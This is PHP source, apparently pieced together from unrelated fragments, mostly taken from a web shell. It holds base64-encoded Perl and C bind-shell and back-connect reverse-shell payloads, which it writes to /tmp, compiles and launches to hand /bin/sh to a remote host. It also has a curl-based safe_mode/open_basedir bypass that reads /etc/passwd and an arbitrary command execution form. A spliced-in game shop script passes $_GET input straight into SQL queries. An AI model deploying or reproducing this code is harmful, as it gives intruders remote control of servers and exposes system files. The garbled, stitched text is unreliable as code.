$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\n\t<span>Bind port to /bin/sh</span><br/>\n\tPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\n\t<span>Back-connect to</span><br/>\n\tServer: <input type='text' name='server' value=" . $_SERVER['REMOTE_ADDR'] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c", $bind_port_c);
$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$▖ .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp") . "</pre>";
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$▖ = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp.pl") . "</pre>";
}
if ($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c", $back_connect_c);
$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$▖ .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc") . "</pre>";
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$▖ = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc.pl") . "</pre>";
}
}
echo '</div>';
hardFooter();
}
require_once 'sql.php';
$pytanie = "select nazwa, bonus, minus, cena from items";
$tab = GetPacket($pytanie);
$keys = array_keys($tab);
echo "<table>";
for ($i = 0; $i < count($tab); $i++) {
echo "<tr>";
foreach ($tab[$keys[$i]] as $key => $value) {
echo "<td>" . $value . " </td>";
}
echo "<td>" . "<a href='bazar.php?item={$i}'>kup</a>" . " </td>";
echo "</tr>";
}
echo "</table>";
$item = $_GET['item'];
if (isset($item)) {
$money = GetValue("select gold from `character` cha join user us on cha.userid=us.id where us.login = '******'");
$koszt = GetValue("select cena from items where id = '{$item}' ");
if ($koszt > $money) {
echo "<p>Nie stac Cie !</p>";
} else {
$id = GetValue("select ID from user where login = '******'");
$pytanie = "insert into inventory set charid = '{$id}',\n itemid = '{$item}',\n `use` = 'FALSE'";
echo "<p> {$pytanie} </p>";
ex($pytanie);
$gold = $money - $koszt;
ex("update `character` set gold='{$gold}' where userid = '{$id}'");
echo "<p>Zakup zakonczony sukcesem</p>";
}
}
echo "<a href='main.php'>Wroc</a>";
if (!empty($value)) {
if (!file_exists($value)) {
mkdir($value);
chdir($value);
} else {
chdir($value);
}
}
}
for ($i = 0; $i < count($p); $i++) {
$addallslashes .= "/";
chdir("..");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $strtotalfile . $addallslashes . $strfile);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
//execute function
if (funcex("curllf", 'Bypass: safe_mode & open_basedir with function ')) {
com('Using: curllf("/etc/passwd");' . br);
curllf("/etc/passwd");
}
}
echo '</textarea>' . ln;
echo '<textarea style="width: 100%; height: 70%;">' . ln;
wr(ex($formcmd));
echo '</textarea>' . ln;
echo '<input type="text" name="cmd" value="' . $formcmd . '" style="width: 100%; height: 10%;" />' . br;
echo '<input type="submit" name="exec" value="exec" style="width: 50%; height: 10%;" /><input type="reset" name="remove" value="remove" style="width: 50%; height: 10%;" />' . ln;
//==============xac dinh os==================
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft)) {
$sertype = "win";
} else {
$sertype = "nix";
}
//=========================================
$uname = ex('uname -a');
echo "<br>OS: </b><font color=blue>";
if (empty($uname)) {
echo php_uname() . "</font><br><b>";
} else {
echo $uname . "</font><br><b>";
}
$id = ex('id');
$server = $HTTP_SERVER_VARS['SERVER_SOFTWARE'];
echo "SERVER: </b><font color=blue>" . $server . "</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)) {
echo $id . "</font><br><b>";
} else {
echo "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "</font><br><b>";
}
echo "<font color=\"black\"><a href=" . $_SERVER['PHP_SELF'] . "?act=info target=_blank>Php Info</a></font><br></div>";
?>
</td><tr>
<td width="20%" align="center"><a href="<?php
echo $myname;
?>
?act=manager"> File Manager</a></td>
